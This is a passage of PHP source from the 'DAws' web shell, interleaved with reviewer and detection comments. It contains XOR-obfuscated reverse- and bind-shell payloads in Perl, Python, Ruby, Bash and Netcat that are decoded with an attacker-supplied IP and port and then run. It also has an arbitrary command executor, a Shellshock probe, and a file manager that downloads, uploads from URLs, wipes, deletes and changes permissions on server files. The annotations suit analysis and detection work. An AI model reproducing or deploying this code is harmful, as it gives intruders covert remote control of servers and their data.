        } else {
            $everything_ready = False;
        }

        //round-trip check: the key is usable only if an echo over SSH comes back
        if ($everything_ready == True) {
            if (execute_ssh("echo dotcppfile") == "dotcppfile") {
                $_SESSION["ssh"] = True;
            } else {
                $_SESSION["ssh"] = False;
            }
        } else {
            $_SESSION["ssh"] = False;
        }
    }
} else if (isset($_POST["reverse_ip"])) { //reverse shells
    //payload templates are stored XOR-obfuscated under the fixed key "dotcppfile"
    //and decoded with unxor_this(); ip="127.0.0.1" / port=4444 are the placeholders
    //replaced below. With no matching language $shell, $location and $extension
    //stay undefined.
    $rs_lang = unxor_this($_POST["rs_lang"]);

    if ($rs_lang == "Perl") {
        $shell = "ERwRQyMfBQIJEV9lfkcZAFtLXVdTQURNQF5XS1dvQB8bEQRNUl1YUV9lfhAfEw0MGE03Q1QzNi8vJykxSE8nLDM7OTo4NyEuOU9QFwMdHBcLGxsBCR4HBAlNRhsXE1JZT1Jmbw0JXAAfHggMDxFMPFhDAx8FAg0BAB0rCh5YQhkDFxBDVAoeFRI2DRELAVxHGQBPQEVMbhR+ah8AAwdENjArPS1cUlhPP0dNVH5qHwADB0Q2MCs7NiRcRFdKNkZGT2l5HxYMAk03OzAmIiJKS1JDN01dWHp5AxEJBkxNWwEZHkkaBEVJBlZKS3obUg==";
        $location = $_SESSION["perl"];
        $extension = "pl";
    } else if ($rs_lang == "Python") {
        $shell = "DQIEDAIERhoDBg8KAE9QAxMLHBcLDBEQA1xGBh9vbgYEXlJBVF5CVUpfWlJSehYGHhFZW0BXRHpsGkxYRBwbABsVEkcfCgcEERdYAwkKBwAQQTUlLzkoLDhJRBwbABsVEkc/KickKzAkIiMoIUxuHFoAHx4IDA8RTEcdE1xQFgYeEU1GfmkfA0gNGRVWRwdNFhkKDAIKTEZYU1l6CRpCAREfRksDXgAAAAAKAFxKXEFPYwMWSgsBE0JYFUcKDAgKGgxYWUpbRW9uH1ReUAMTCxwXCwwREANeBQgACUw0VkwSGQhGHw1GQ1RBXRlENEU=";
        $location = $_SESSION["python"];
        $extension = "py";
    } else if ($rs_lang == "Ruby") {
        $shell = "FgoFFhkCA0lLFgsMHwYEV2xjBRVZTUVRR15WR1xLVU1+Ex8CElRYUVBbfmkWUFtJOCY0PBsAGxUSRwMVAQFcCgBcRhkDFxBGWhcfLw9jCR0BDFQQAAIPBxgDTE1bARkeSRoERUkGVF9WVQJJUkNBC1RRTlZDDU5JAkMSTxZZ";

        $location = $_SESSION["ruby"];
        $extension = "rb";
    } else if ($rs_lang == "Bash") {
        $shell = "DR9JQUFCUUdcS1RBRUF6AAkbGFhQW0BXenoDEQkGRFpIXV8UAx9DEQcfW0cZAElNHAoWG34AEQRGVUpQRBNUFBgZCgxMFwEOEEMcGQgMV0UAAFRHHBkIDExXWklBQ05WU1JMAQsBEQ==";

        $location = "bash";
        $extension = "sh";
    }

    $ip = unxor_this($_POST["reverse_ip"]);
    $port = unxor_this($_POST["reverse_port"]);

    $shell = unxor_this($shell, "dotcppfile");
    $shell = str_replace("ip=\"127.0.0.1\"", "ip=\"$ip\"", $shell);
    $shell = str_replace("port=4444", "port=$port", $shell);

    //the script is dropped by execute_script() and run detached unless output is wanted
    if (isset($_POST["background"])) {
        execute_script($shell, $location, $extension);
    } else {
        execute_script($shell, $location, $extension, True);
    }
} else if (isset($_POST["bind_port"])) { //bind shells
    //same template scheme as the reverse shells, with only port=4444 substituted
    $bs_lang = unxor_this($_POST["bs_lang"]);

    if ($bs_lang == "Perl") {
        $shell = "ERwRQyMfBQIJEV9lfkcAHxQdUVFQW0BYenoVBg8OARtcMDUiMCw+SUQuMjw5PiM9QEU3IDcoLyMyOykkKUNUBBUEFhsDEQsNDQ0RHQNBSxEHH1NKWUtsYwUDTA0dDRRYNSw+MyE9WEMDHwUCDQEAHSsKHlhCGQMXEENUCh4VEjYNEQsBXEFBQlFHXEtUQUVBWVlPQGYebmYYCgMEAwdENiE9IiYiXFdZRV5EZX0CExMDGRhNJyM9Jj4kSjopNzIqJkpLemxgAxUBAVwwJDQvJ0BHWkk3Lzk1KD1OTF9lfQwAFQhBPzEgICE3XFJYTy8pLSo6N1JZXWNlChQKGksjJCIsPjdITUpFMzwvLCIxRkZPaXkVHgwPTUZAFgoeXxUBTEgNTV1Yeg0=";
        $location = $_SESSION["perl"];
        $extension = "pl";
    } else if ($bs_lang == "Python") {
        $shell = "DQIEDAIERhoDBg8KAE9QAxMLHBcLDBEQA1xGBh9vbh8bEQRNUl1YUW5lB0NNUBUGDw4BG1oQHxMNDBhNFwAXCBUESCgqOi0hMTdcUBUGDw4BG1owPzMtNj8xNio1Lll6FUcODAoLXEtSQVReQlVKX1pSUlxGGQMXEEZdaQNeCgAfEQEBXFZZemwKAwsKQ1QCFBQUSVFFF0EVABMVFh1ETG5lGxBeFBMZXk0HABoNXhYPBQkLC0ddT0BZbAYfSwAaBFFYEwkHAksCBhgGHh9OQEBUTWUbEF4UExleTQcAGg1eFg8FCQsLR11PQllsYxxFWU8HFhIAFAYPABccWgARHApBN0dLDR0NXwMOS0BFRkIdQS1Z";
        $location = $_SESSION["python"];
        $extension = "py";
    } else if ($bs_lang == "Ruby") {
        $shell = "FgoFFhkCA0lLFgsMHwYEV2xjHAoWG0lXRERSY2YWAR0CBgJQW0k4JjQ8EREGFRRHAgATTwQMAgRsCgAMAQEAQ01QFQweEwEdWgITEwMZGG9uCgwGE1AVGR4MChsSS1JfBAACShcHVE4ZUFpPSQFEUVJGFFBUV0pAAE1YABwZAwcYSQcDHQYeBEoKAAwBAQBK";

        $location = $_SESSION["ruby"];
        $extension = "rb";
    } else if ($bs_lang == "Netcat") {
        $shell = "FAAGF01EUl1Yb24BF0NdHBAZTEEUAAYXUF0DSUMHDQFbEBg=";

        $location = "bash";
        $extension = "sh";
    }

    $port = unxor_this($_POST["bind_port"]);

    $shell = unxor_this($shell, "dotcppfile");
    $shell = str_replace("port=4444", "port=$port", $shell);

    if (isset($_POST["background"])) {
        execute_script($shell, $location, $extension);
    } else {
        execute_script($shell, $location, $extension, True);
    }
}
1574
//Resolves the directory the file manager should list. 'dir' arrives
//XOR-obfuscated like every other parameter and is decoded with unxor_this();
//without it the script's own working directory is listed.
if (isset($_POST["dir"])) { //gets the proper value of 'dir'
    $dir = unxor_this($_POST["dir"]);
    $size = strlen($dir);

    if ($_SESSION["windows"] == True) {
        $dir = str_replace('\\', '/', $dir); //that's better for Windows
    }

    //strip every trailing slash
    //NOTE(review): once $dir is empty the offset $size - 1 is -1; the loop
    //presumably ends on an undefined-offset notice rather than on a clean check
    while ($dir[$size - 1] == '/') {
        $dir = substr($dir, 0, $size - 1);
        $size = strlen($dir);
    }
} else {
    $dir = getcwd();
}
1590
1591//html, css and js code
1592echo "
1593<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN'
1594'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'>
1595<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
1596<head>
1597<meta http-equiv='content-type' content='text/html; charset=utf-8'/>
1598<title>DAws</title>
1599<style type=\"text/css\">
1600 * {
1601 font-size: 12px;
1602 }
1603 html {
1604 overflow-y: scroll;
1605 }
1606 body {
1607 font-family: Verdana, Geneva, sans-serif;
1608 line-height: 1.4;
1609 background: #242625;
1610 color: #F9F7ED;
1611 margin: 0;
1612 padding: 0;
1613 }
1614 textarea {
1615 width: 80%;
1616 height: 150px;
1617 }
1618 a {
1619 color: #B3E1EF;
1620 text-decoration: none;
1621 }
1622 h1 a {
1623 font-weight: 100;
1624 font-size: 28px;
1625 color: #B3E1EF;
1626 }
1627 h3 {
1628 margin-top: 3%;
1629 margin-bottom: 1%;
1630 }
1631 h3 a {
1632 font-size: 18px;
1633 }
1634 caption, caption * {
1635 text-decoration: none;
1636 font-size:16px;
1637 color: #B3E1EF;
1638 margin-bottom: 5px;
1639 }
1640 .flat-table {
1641 text-align: center;
1642 background: #3F3F3F;
1643 margin-top: 1%;
1644 margin-bottom: 1%;
1645 border-collapse: collapse;
1646 border: 1px solid black;
1647 width: 100%;
1648 }
1649 .flat-table th {
1650 background: #2C2F2D;
1651 height: 30px;
1652 line-height: 30px;
1653 font-weight: 600;
1654 font-size: 14px;
1655 padding-left: 10px;
1656 color: #F9F7ED;
1657 border: 1px solid black;
1658 }
1659 .flat-table td {
1660 height: 30px;
1661 border: 1px solid black;
1662 }
1663 .flat-table-2 {
1664 text-align: center;
1665 background: #3F3F3F;
1666 margin-top: 10px;
1667 margin-bottom: 10px;
1668 width: 505px;
1669 height: 335px;
1670 }
1671 .flat-table tr:hover{
1672 background: rgba(0,0,0,0.19);
1673 }
1674 .danger {
1675 color: red;
1676 }
1677 .success {
1678 color: green;
1679 }
1680 .a_button {
1681 border: none;
1682 background: none;
1683 padding: 0;
1684 color: #B3E1EF;
1685 }
1686 .a_button:hover {
1687 text-decoration: underline;
1688 cursor: pointer;
1689 }
1690 .left {
1691 position: fixed;
1692 width: 18%;
1693 height: 95%;
1694 margin: 1%;
1695 top: 0;
1696 left: 0;
1697 overflow-y: auto;
1698 }
1699 .right {
1700 position: fixed;
1701 width: 18%;
1702 height: 95%;
1703 margin: 1%;
1704 top: 0;
1705 right: 0;
1706 overflow-y: auto;
1707 }
1708 .center {
1709 width: 60%;
1710 margin-left: 20%;
1711 }
1712</style>
1713
1714<script>
1715function xor_str(to_xor) { //javascript encryption used for our live inputs.
1716 var key = \"".$_SESSION['key']."\";
1717 var the_res = \"\";
1718 for(i=0; i<to_xor.length;) {
1719 for(j=0; (j<key.length && i<to_xor.length); ++j,++i) {
1720 the_res+=String.fromCharCode(to_xor.charCodeAt(i)^key.charCodeAt(j));
1721 }
1722 }
1723 return btoa(the_res);
1724}
1725
1726function xorencr(input) { //gets our inputs as an array and uses 'xor_str` to encrypt them.
1727 var arrayLength = input.length;
1728 var field = String();
1729 for (var i = 0; i < arrayLength; i++) {
1730 field = document.getElementById(input[i]);
1731 field.value = xor_str(field.value);
1732 }
1733}
1734
1735function show_div(div_name) { //used by the 'rename' form in the file manager to show/hide the div when clicked.
1736 if (document.getElementById(div_name).style.display == \"block\") {
1737 document.getElementById(div_name).style.display = \"none\";
1738 } else {
1739 document.getElementById(div_name).style.display = \"block\";
1740 }
1741}
1742
1743</script>
1744</head>
1745
1746<body>
1747
1748<div class='left' id='left'>
1749<table class='flat-table' style='width:100%;height:100%;'>
1750 <caption>Various information</caption>
1751 <tr>
1752 <th style='width:40%;'>Info</th>
1753 <th>Value</th>
1754 </tr>
1755 <tr>
1756 <td>Version</td>
1757 <td>".php_uname()."</td>
1758 </tr>
1759 <tr>
1760 <td>Server's IP</td>";
// ---- Left panel: host / process fingerprint table ----
// The <table> and its first rows are opened inside the echo string just above; this run fills the
// remaining cells. Analyst note: everything below executes on every request that renders this page.

// "Server's IP" cell. The loose `!= null` also treats an empty SERVER_ADDR as missing, in which case the
// fallback prints HTTP_HOST, i.e. the Host header supplied by the client.
if ($_SERVER['SERVER_ADDR'] != null) {
    echo "<td>".$_SERVER['SERVER_ADDR']."</td>";
} else { //for IIS
    echo "<td>".$_SERVER['HTTP_HOST']."</td>";
}

// $_SESSION["process_owner"] is populated outside this view (presumably at session setup); it is reused
// further down the page as the gate for the chmod form.
echo "</tr>
    <tr>
        <td>Process Owner</td>
        <td>".$_SESSION["process_owner"]."</td>
    </tr>";

// Effective group name. installed_php() is defined elsewhere; from its use here it presumably reports
// whether the named PHP function is available. Without the posix extension the cell stays empty.
$group_name = "";
if (installed_php("posix_geteuid")) { //Linux
    $group_name = posix_getgrgid(posix_geteuid());
    $group_name = $group_name["name"];
}
echo "
    <tr>
        <td>Group Name</td>
        <td>".$group_name."</td>
    </tr>";

// Script owner and the size of the filesystem holding "/" in whole GiB (1073741824 = 2^30).
// NOTE(review): on Windows realpath("/") presumably resolves against the current drive; the session caches
// realpath("\\") as windows_drive at startup but it is not used here.
echo "
    <tr>
        <td>Script Owner</td>
        <td>".get_current_user()."</td>
    </tr>
    <tr>
        <td>Disk Total Space</td>
        <td>".floor((disk_total_space(realpath("/")))/(1073741824))." GB</td>
    </tr>";

// Total RAM. execute_command() is defined outside this view; judging by the strings passed to it, it runs a
// shell command and returns its output. Detection note: both branches, like the Shellshock probe below,
// spawn a child process from the web-server account on every page render.
if ($_SESSION["windows"] == True) { //causing the shell to load slowly because of the command itself but it's worth it
    // wmic prints a header line followed by one capacity value (bytes) per memory module: drop the header
    // with unset($total_amount[0]), sum the rest, convert to GiB.
    $total_amount = execute_command("wmic memorychip get capacity");
    $total_amount = explode("\n", $total_amount);
    unset($total_amount[0]);
    $total_memory = 0;
    foreach ($total_amount as $amount) {
        $total_memory += $amount;
    }
    $total_memory /= 1073741824;

    echo "
    <tr>
        <td>Total RAM</td>
        <td>$total_memory GB</td>
    </tr>";
} else {
    // `free -m` reports MiB; the second column of the Mem line is the total and is converted to GiB below.
    // The row is omitted entirely when the command yields no output.
    $total_memory = execute_command("free -mt | grep Mem | awk '{print \$2}'");
    if ($total_memory != null) {
        echo "
    <tr>
        <td>Total RAM</td>
        <td>".($total_memory/1024)." GB</td>
    </tr>";
    }
}

// Client IP, the per-session XOR key, install directory and capability flags.
// NOTE(review): the session key is emitted in clear text here and again inside the xor_str() JavaScript in
// the <head>; form values are merely XOR'd with that key and base64'd (btoa) before being POSTed. Anyone
// holding a copy of this response (proxy log, capture, browser cache) can therefore decode the POST bodies.
// The scheme hides parameters from casual log review; it provides no confidentiality.
echo "
    <tr>
        <td>Your IP</td>
        <td>".$_SERVER['REMOTE_ADDR']."</td>
    </tr>
    <tr>
        <td>Encryption Key</td>
        <td>".$_SESSION["key"]."</td>
    </tr>
    <tr>
        <td>DAws's Directory</td>
        <td>".$_SESSION["daws_directory"]."</td>
    </tr>
    <tr>
        <td>CGI</td>
        <td>";
// cgi / cgi_url / shsh flags come from session state populated elsewhere — not verifiable from this view.
if ($_SESSION["cgi"]) {
    echo "True</td>";
} else {
    echo "False</td>";
}
echo "
    </tr>
    <tr>
        <td>CGI Shell</td>
        <td>".$_SESSION["cgi_url"]."</td>
    </tr>
    <tr>
        <td>Shellshock threw DAws</td>
        <td>";
if ($_SESSION["shsh"]) {
    echo "True</td>";
} else {
    echo "False</td>";
}
echo "
    </tr>
    <tr>
        <td>Shellshock</td>
        <td>";
// Live Shellshock probe, run unconditionally on every render (even for Windows sessions): bash is started
// with an environment variable holding a function definition plus a trailing command. The "True" branch
// requires the marker twice — once from the explicit `bash -c` echo and once from the env-var payload.
// Detection note: a web-server process launching bash with this env-var shape is a strong host signal.
if (execute_command("env x='() { :;}; echo dotcppfile' bash -c \"echo dotcppfile\"") == "dotcppfile\ndotcppfile\n") {
    echo "True</td>";
} else {
    echo "False</td>";
}
echo "
    </tr>
    <tr>
        <td>SSH Method</td>
        <td>";

// $_SESSION["ssh"] is set elsewhere (presumably by the "Setup SSH" handler); isset() guards the read.
if ((isset($_SESSION["ssh"])) && ($_SESSION["ssh"] == True)) {
    echo "True</td>";
} else {
    echo "False</td>";
}

// Close the left panel and open the right panel: a listing of DAws's own directory. The caption form
// navigates the File Manager to that directory; xor_this() (not in view) is presumably the PHP twin of
// the xor_str() JavaScript, so the hidden 'dir' value arrives already encoded.
echo "
    </tr>
</table>
</div>

<div class='right'>
<table class='flat-table' style='table-layout: fixed;'>
    <caption>
        <form style='display:inline;' action='#File Manager' method='post'>
            <input type='hidden' name='dir' value='".xor_this($_SESSION["daws_directory"])."' />
            <input type='submit' value=\"DAws's directory\" class='a_button'/>
        </form>
    </caption>
    <tr>
        <th style='width: 20%;'>Type</th>
        <th>Name</th>
    </tr>";
1892
1893
// ---- Right panel body: one row per entry in $_SESSION["daws_directory"] ----
// Silently renders nothing if the directory cannot be opened (opendir() returns false).
if ($handle = opendir($_SESSION["daws_directory"])) {
    $rows = array();
    // $topdir (the parent path, up to and including the last "/") is computed here but never used in this
    // listing; only the File Manager section below renders an "[UP]" row.
    $pos = strrpos($_SESSION["daws_directory"], "/");
    $topdir = substr($_SESSION["daws_directory"], 0, $pos + 1);
    $i = 0;
    // Collect name + is-directory flag for every entry except "." and "..".
    while (false !== ($file = readdir($handle))) {
        if ($file != "." && $file != "..") {
            $rows[$i]['data'] = $file;
            $rows[$i]['dir'] = is_dir($_SESSION["daws_directory"] . "/" . $file);
            $i++;
        }
    }
    closedir($handle);

    $size = count($rows);

    if ($size != 0) {
        // sortRows() is defined elsewhere; presumably orders the entries for display — verify.
        $rows = sortRows($rows);

        for ($i = 0; $i < $size; ++$i) {
            $curr_dir = $_SESSION["daws_directory"] . "/" . $rows[$i]['data'];
            echo "<tr><td>";
            if ($rows[$i]['dir']) {
                echo "[DIR]";
            } else {
                echo "[FILE]";
            }

            echo "</td>";

            // Readable entries become a POST form that points the File Manager at that path (paths go
            // through xor_this()). The raw entry name is interpolated into the value='' attribute and the
            // plain cell with no escaping — a name containing a quote breaks the markup.
            if (is_readable($curr_dir)) {
                echo "
    <td>
        <form style='font-color=;display:inline;' action='#File Manager' method='post'>
            <input type='hidden' name='dir' value='".xor_this($curr_dir)."' />
            <input type='hidden' name='old_dir' value='".xor_this($_SESSION["daws_directory"])."' />
            <input type='submit' value='".$rows[$i]['data']."' class='a_button' />
        </form>
    </td>";
            } else {
                echo "<td>".$rows[$i]['data']."</td>";
            }
        }
    }
}
1939
// ---- Centre column: page title and the "Commander" section ----
// NOTE(review): the <h1> link emits $_SERVER['PHP_SELF'] as an unquoted href attribute; PHP_SELF is
// request-derived and is not escaped here.
// $GLOBALS["disabled_php"] / ["disabled_suhosin"] are arrays built outside this view (presumably the
// parsed disable_functions and suhosin blacklist — verify); they are joined with "," for display.
// $dir is the File Manager's current path and is assigned before this view; every form on the page
// carries it back as a hidden, xor_this()-encoded 'dir' field so the handler can restore it.
// Markup note: the <form> element is opened directly between <tr>s rather than inside a cell — invalid
// nesting that browsers tolerate; the same pattern recurs in the File Manager, Eval and SQL tables.
echo "
</table>
</div>

<div class='center' id='center'>
<center>

<h1><a href=".$_SERVER['PHP_SELF'].">DAws</a> 5/12/2015</h1>

Coded by <a href=\"https://twitter.com/dotcppfile\">dotcppfile</a> and Team Salvation

<h3><A NAME='Commander' href='#Commander'>Commander</A></h3>

<p class='danger'>Using full paths in your commands is suggested.</p>

<table class='flat-table' style='table-layout:fixed; word-wrap:break-word;'>
    <tr>
        <td style='width: 20%;'>disabled php</td>
        <td style='word-wrap:break-word;'>".implode(",", $GLOBALS["disabled_php"])."</td>
    </tr>
    <tr>
        <td style='width: 20%;'>disabled suhosin</td>
        <td style='word-wrap:break-word;'>".implode(",", $GLOBALS["disabled_suhosin"])."</td>
    </tr>
    <form style='display:inline;' action='#Commander' method='post' onsubmit=\"xorencr(['command'])\">
    <tr>
        <td style='height:50px;' colspan='2'>Command:
            <input type='text' size='40%' name='command' id='command'/>
            <input type='hidden' name='dir' value='".xor_this($dir)."'/>
            <input type='submit' value='Execute'/>
        </td>
    </tr>";

// $GLOBALS["command"] is set outside this view — presumably the output of the last submitted command,
// stored by the POST handler. It is echoed into the table verbatim, with no escaping.
if (isset($GLOBALS["command"])) {
    echo "
    <tr>
        <td style='text-align:left; padding:1%;' colspan='2'>".$GLOBALS["command"]."</td>
    </tr>";
}

// Close the Commander table and open the File Manager section. ("ouputs" is a typo in the runtime
// string; left as-is here.)
echo "
    </form>
</table>


<h3><A NAME='File Manager' href='#File Manager'>File Manager</A></h3>

<p class='danger'>Uploading and Zipping functions ouputs in DAws's directory.</p>";
1988
// ---- File Manager ----
// Three outcomes for $dir (assigned before this view): a readable directory is listed with per-entry
// action forms; a readable file is shown in a textarea (editable when writable); anything else gets a
// "Go Back" form and an error line.
// NOTE(review): $_POST["old_dir"] is echoed straight into hidden 'dir' fields in the file and error
// branches below without xor_this() or any escaping. Every form on this page that sets old_dir fills it
// with xor_this(...), so the value is presumably expected to arrive already encoded — but it is reflected
// request input and nothing here verifies that.
if (file_exists($dir) && (is_readable($dir))) {
    if (is_dir($dir)) {
        // Header table: the process's cwd (getcwd()) as a navigation link, the current path, and a
        // text form for changing directory / opening a file. $dir is interpolated unescaped into both
        // the text and the value='' attribute.
        echo "
        <table class='flat-table' style='height: 100px;'>
            <tr>
                <td>Shell's Directory:
                    <form style='display:inline;' action='#File Manager' method='post'>
                        <input type='hidden' name='dir' value='".xor_this(getcwd())."' />
                        <input type='submit' value='".getcwd()."' class='a_button' />
                    </form>
                </td>
            </tr>
            <tr>
                <td>Current Directory: $dir</td>
            </tr>
            <tr>
                <td>Change Directory/Read File:
                    <form action='#File Manager' method='post' onsubmit=\"xorencr(['dir'])\" style='display:inline'>
                        <input style='width:250px' name='dir' id='dir' type='text' value='$dir'/>
                        <input name='old_dir' id='old_dir' type='hidden' value='".xor_this($dir)."'/>
                        <input type='submit' value='Change' name='Change'/>
                    </form>
                </td>
            </tr>
        </table>";

        if ($handle = opendir($dir)) {
            $rows = array();
            // Parent path = everything up to and including the last "/". Note: for a path with no "/"
            // strrpos() returns false and `$pos + 1` evaluates to 1, so $topdir is the first character.
            $pos = strrpos($dir, "/");
            $topdir = substr($dir, 0, $pos + 1);
            $i = 0;
            while (false !== ($file = readdir($handle))) {
                if ($file != "." && $file != "..") {
                    $rows[$i]['data'] = $file;
                    $rows[$i]['dir'] = is_dir($dir . "/" . $file);
                    $i++;
                }
            }
            closedir($handle);

            $size = count($rows);

            // Listing table header plus the "[UP]" navigation row (7 columns).
            echo "
        <table class='flat-table'>
            <tr>
                <th>Type</th>
                <th>Name</th>
                <th>Size (bytes)</th>
                <th>File Owner</th>
                <th>File Group</th>
                <th>Permissions</th>
                <th>Actions</th>
            </tr>

            <tr>
                <td>[UP]</td>
                <td>
                    <form style='display:inline;' action='#File Manager' method='post'>
                        <input type='hidden' name='dir' value='".xor_this($topdir)."' />
                        <input type='hidden' name='old_dir' value='".xor_this($dir)."'/>
                        <input type='submit' value='..' class='a_button' />
                    </form>
                </td>
                <td></td>
                <td></td>
                <td></td>
                <td></td>
                <td></td>
            </tr>";

            if ($size != 0) {
                $rows = sortRows($rows); // defined elsewhere; presumably orders entries for display

                for ($i = 0; $i < $size; ++$i) {
                    $curr_dir = $dir . "/" . $rows[$i]['data'];
                    // Column 1: type. Directories win; otherwise symlinks are distinguished from files.
                    echo "<tr><td>";
                    if ($rows[$i]['dir']) {
                        echo "[DIR]";
                    } else if (is_link($curr_dir) == False) {
                        echo "[FILE]";
                    } else {
                        echo "[LINK]";
                    }
                    echo "</td>";

                    // Column 2: name. Readable entries get a navigation form; for symlinks the display
                    // name is extended with " -> target" ($curr_dir was built above and is unaffected).
                    // The name is interpolated into value='' with no escaping.
                    if (is_readable($curr_dir)) {
                        if (is_link($curr_dir)) {
                            $rows[$i]['data'] .= " -> ".readlink($curr_dir);
                        }

                        echo "
                    <td>
                        <form style='font-color=;display:inline;' action='#File Manager' method='post'>
                            <input type='hidden' name='dir' value='".xor_this($curr_dir)."' />
                            <input type='hidden' name='old_dir' value='".xor_this($dir)."' />
                            <input type='submit' value='".$rows[$i]['data']."' class='a_button' />
                        </form>
                    </td>";
                    } else {
                        echo "<td>".$rows[$i]['data']."</td>";
                    }

                    // Columns 3-6 (size, owner, group, permissions) are only filled when the *directory*
                    // is executable (i.e. searchable); errors from the stat family are @-suppressed.
                    if (is_executable($dir)) {
                        echo "<td>".@filesize($curr_dir)."</td>";
                    } else {
                        echo "<td></td>";
                    }

                    // Owner/group: numeric ids from fileowner()/filegroup(), resolved to names when the
                    // posix functions exist. Without posix_getpwuid the numeric id is what gets printed and
                    // what the chmod gate below compares against.
                    $fileowner = "";
                    $filegroup = "";
                    if ((is_executable($dir)) && (installed_php("fileowner")) && (installed_php("filegroup"))) {
                        $fileowner = @fileowner($curr_dir);
                        $filegroup = @filegroup($curr_dir);

                        if (installed_php("posix_getpwuid")) {
                            $fileowner = @posix_getpwuid($fileowner);
                            $fileowner = $fileowner["name"]; //don't blame me for this, blame old versions of php...
                            $filegroup = @posix_getgrgid($filegroup);
                            $filegroup = $filegroup["name"];
                        }
                    }
                    echo "<td>$fileowner</td>";
                    echo "<td>$filegroup</td>";

                    // get_permissions() is defined elsewhere (not in view).
                    if (is_executable($dir)) {
                        echo "<td>".@get_permissions($curr_dir)."</td>";
                    } else {
                        echo "<td></td>";
                    }

                    // Column 7: action forms. Each one POSTs back to this page with a distinguishing hidden
                    // field (zip / download / wipe / del / old_name / file_name); the handlers live outside
                    // this view. Detection note: those field names are the request-body artefacts to look for.
                    echo "<td>";
                    if (is_dir($curr_dir)) { //for directories only
                        if (is_readable($curr_dir)) {
                            echo "
                        <form style='font-color=;display:inline;' action='#File Manager' method='post'>
                            <input type='hidden' name='zip' value='".xor_this($curr_dir)."'/>
                            <input type='hidden' name='dir' value='".xor_this($dir)."' />
                            <input type='submit' class='a_button' value='Zip'/>
                        </form>";
                        }
                    } else { //for files only
                        // The Download form is the only one that does not carry the 'dir' field back.
                        if (is_readable($curr_dir)) {
                            echo "
                        <form style='font-color=;display:inline;' action='#File Manager' method='post'>
                            <input type='hidden' name='download' value='".xor_this($curr_dir)."'/>
                            <input type='submit' class='a_button' value='Download'/>
                        </form>";
                        }

                        // "Edit" simply navigates to the file (dir = file path), which lands in the
                        // read/edit branch further down; "Wipe" is a distinct handler.
                        if ((is_readable($curr_dir)) && (is_writable($curr_dir))) {
                            echo "
                        <form style='font-color=;display:inline;' action='#File Manager' method='post'>
                            <input type='hidden' name='dir' value='".xor_this($curr_dir)."' />
                            <input type='hidden' name='old_dir' value='".xor_this($dir)."' />
                            <input type='submit' class='a_button' value='Edit'/>
                        </form>";

                            echo "
                        <form style='font-color=;display:inline;' action='#File Manager' method='post'>
                            <input type='hidden' name='wipe' value='".xor_this($curr_dir)."'/>
                            <input type='hidden' name='dir' value='".xor_this($dir)."' />
                            <input type='submit' class='a_button' value='Wipe'/>
                        </form>";
                        }
                    }

                    // Rename and Delete require rwx on the containing directory. The rename <div> id and
                    // the input id embed xor_this($curr_dir); show_div()/xorencr() in the <head> locate
                    // them by that id. (Whether xor_this() output is always a valid id is not verifiable here.)
                    if ((is_readable($dir)) && (is_writable($dir)) && (is_executable($dir))) {
                        echo "
                        <input type='button' class='a_button' value='Rename' onclick=\"show_div('rename-".xor_this($curr_dir)."')\"/>

                        <div id='rename-".xor_this($curr_dir)."' style='display:none;'>
                            <form action='#File Manager' method='post' onsubmit=\"xorencr(['new_name-".xor_this($curr_dir)."'])\">
                                <input style='width:150px' name='new_name' id='new_name-".xor_this($curr_dir)."' type='text' value=''/>
                                <input type='hidden' name='old_name' value='".xor_this($curr_dir)."'/>
                                <input type='hidden' name='dir' value='".xor_this($dir)."' />
                                <input type='submit' value='Rename'/>
                            </form>
                        </div>";


                        echo "
                        <form style='font-color=;display:inline;' action='#File Manager' method='post'>
                            <input type='hidden' name='del' value='".xor_this($curr_dir)."'/>
                            <input type='hidden' name='dir' value='".xor_this($dir)."' />
                            <input type='submit' class='a_button' value='Del'/>
                        </form>";
                    }

                    // Chmod is offered when the entry's owner matches the process owner. Loose `==` on
                    // values that may be "" (unresolved), a numeric uid, or a name depending on the
                    // branches above — so the gate is only as reliable as the owner lookup.
                    if ($_SESSION["process_owner"] == $fileowner) { //can we chmod?
                        echo "
                        <input type='button' class='a_button' value='Chmod' onclick=\"show_div('chmod-".xor_this($curr_dir)."')\"/>

                        <div id='chmod-".xor_this($curr_dir)."' style='display:none;'>
                            <form action='#File Manager' method='post' onsubmit=\"xorencr(['new_chmod-".xor_this($curr_dir)."'])\">
                                <input style='width:150px' name='new_chmod' id='new_chmod-".xor_this($curr_dir)."' type='text' value='' placeholder='Example: 666'/>
                                <input type='hidden' name='file_name' value='".xor_this($curr_dir)."' />
                                <input type='hidden' name='dir' value='".xor_this($dir)."' />
                                <input type='submit' value='Chmod'/>
                            </form>
                        </div>";
                    }

                    echo "</td></tr>";
                }
            }

            // Upload forms: multipart browse upload (file_upload[]) and fetch-by-URL (link_download).
            // Both are always shown; create-file / create-folder only when $dir is writable.
            echo "
        </table>
        <table class='flat-table' style='height: 100px;'>
            <tr>
                <form action='#File Manager' method='post' enctype='multipart/form-data'>
                    <td>Upload File(s) (Browse):</td>
                    <td><input type='file' value='Browse' name='file_upload[]' multiple/></td>
                    <input type='hidden' name='dir' value='".xor_this($dir)."'/>
                    <td><input type='submit' value='Upload'/></td>
                </form>
            </tr>
            <tr>
                <form action='#File Manager' method='post' onsubmit=\"xorencr(['link_download'])\">
                    <td>Upload File (Link):</td>
                    <td><input placeholder='Direct Links required!' style='width:80%' id='link_download' name='link_download' type='text'/></td>
                    <input type='hidden' name='dir' value='".xor_this($dir)."'/>
                    <td><input type='submit' value='Upload'/></td>
                </form>
            </tr>";

            if (is_writable($dir)) {
                echo "
            <tr>
                <form action='#File Manager' method='post' onsubmit=\"xorencr(['mkfile'])\">
                    <td>Create File:</td>
                    <td><input style='width:80%' id='mkfile' name='mkfile' type='text'/></td>
                    <input type='hidden' name='dir' value='".xor_this($dir)."'/>
                    <td><input type='submit' value='Create'/></td>
                </form>
            </tr>
            <tr>
                <form action='#File Manager' method='post' onsubmit=\"xorencr(['mkdir'])\">
                    <td>Create Folder:</td>
                    <td><input style='width:80%' id='mkdir' name='mkdir' type='text'/></td>
                    <input type='hidden' name='dir' value='".xor_this($dir)."'/>
                    <td><input type='submit' value='Create'/></td>
                </form>
            </tr>";
            }

            echo "</table>";
        }
    } else {
        // $dir is a readable file: read_file() (defined elsewhere) supplies $content, which is dumped
        // into a <textarea> verbatim. NOTE(review): no escaping — a file containing "</textarea>" breaks
        // out of the editor markup.
        $content = read_file($dir);

        echo "
        <br/>
        <form action='#File Manager' method='post'>
